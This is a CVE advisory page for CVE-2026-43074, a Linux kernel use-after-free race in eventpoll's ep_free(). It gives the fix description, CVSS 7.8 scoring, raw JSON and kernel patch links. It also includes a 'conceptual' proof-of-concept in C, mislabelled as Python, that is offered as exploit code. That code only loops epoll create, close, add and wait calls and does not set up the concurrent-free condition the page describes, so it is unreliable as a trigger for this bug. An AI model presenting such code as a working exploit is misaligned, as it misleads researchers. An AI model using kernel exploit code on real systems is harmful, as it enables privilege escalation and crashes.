Security Vulnerability Report
中文
CVE-2026-43074 CVSS 7.8 HIGH

CVE-2026-43074

Published: 2026-05-06 10:16:20
Last Modified: 2026-05-08 13:16:38
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: eventpoll: defer struct eventpoll free to RCU grace period In certain situations, ep_free() in eventpoll.c will kfree the epi->ep eventpoll struct while it still being used by another concurrent thread. Defer the kfree() to an RCU callback to prevent UAF.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Linux Kernel (修复补丁之前的版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/epoll.h> #include <pthread.h> // Conceptual PoC for CVE-2026-43074 // This attempts to trigger the race condition in ep_free() int epfd; void* racer_thread(void* arg) { // Thread attempting to access the eventpoll structure struct epoll_event ev; ev.events = EPOLLIN; ev.data.fd = 0; while(1) { // Try to access the epoll instance concurrently epoll_ctl(epfd, EPOLL_CTL_ADD, 0, &ev); epoll_wait(epfd, &ev, 1, 0); } return NULL; } int main() { pthread_t t; epfd = epoll_create1(0); if (epfd < 0) return 1; pthread_create(&t, NULL, racer_thread, NULL); // Trigger open/close cycles to stress the allocation/free path for(int i = 0; i < 10000; i++) { int new_epfd = epoll_create1(0); if (new_epfd < 0) continue; close(new_epfd); } close(epfd); pthread_join(t, NULL); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43074", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T10:16:20.343", "lastModified": "2026-05-08T13:16:38.030", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\neventpoll: defer struct eventpoll free to RCU grace period\n\nIn certain situations, ep_free() in eventpoll.c will kfree the epi->ep\neventpoll struct while it still being used by another concurrent thread.\nDefer the kfree() to an RCU callback to prevent UAF."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "references": [{"url": "https://git.kernel.org/stable/c/07712db80857d5d09ae08f3df85a708ecfc3b61f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/5b1173b165421561db29f30afc7e97d940a398a9", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/7e8083f5eeedab0f460063b9c2c14c9a4e71a427", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/a6566cd33f6f967a7651ebf2ce0dd31572e319cf", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/ae0bb9c1fb7c2594519aeeb096cf2c3b7837b322", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.